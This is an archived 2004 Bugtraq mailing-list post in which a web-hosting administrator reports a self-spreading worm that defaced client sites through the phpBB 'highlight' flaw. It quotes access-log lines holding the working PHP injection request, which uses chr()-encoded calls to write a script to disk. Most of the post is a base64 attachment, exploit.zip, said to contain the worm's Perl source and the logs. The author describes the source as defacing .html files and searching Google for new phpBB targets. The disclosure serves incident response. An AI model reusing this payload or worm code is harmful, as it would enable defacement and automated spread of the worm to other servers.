[37846] in bugtraq
phpBB Worm
daemon@ATHENA.MIT.EDU (Shannon Lee)
Tue Dec 21 15:15:04 2004
Message-ID: <41C76571.3010704@webhostworks.net>
Date: Mon, 20 Dec 2004 15:51:13 -0800
From: Shannon Lee <shannon@webhostworks.net>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: multipart/mixed;
boundary="------------060008080109050903090707"
This is a multi-part message in MIME format.
--------------060008080109050903090707
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
This morning one of our client's sites was found to have been defaced
with the words "NeverEverNoSanity WebWorm Generation 9." The defacement
appeared to take place on all .html files in the web root trees of
multiple virtual hosts on the web server in a very short period of time.
After some investigation, we determined that the attacker had gained
access via phpbb in a series of crafted URL requests, like so:
64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5
399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech
r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
OMITTED.com/
viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efw
rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(11
1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(11
5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%25
2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252ec
hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"
After checking the phpbb site, it turns out that this is a vulnerability
posted the 18th of November, called Hilight; we didn't update to prevent
it because the client whose domain it was has their own admin, and we
thought he was taking care of phpBB. Oops. The exploit is described here:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable
of finding .html files to deface, and then going to google and finding
more instances of phpbb to infect. Which makes it a worm. It also
tracks itself by generation; we were generation 9.
Please find attached the above-mentioned script as well as the series of
log entries from access_log.
--Shannon
--------------060008080109050903090707
Content-Type: application/zip;
name="exploit.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="exploit.zip"
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
jQAAAF0hAAAAAA==
--------------060008080109050903090707--
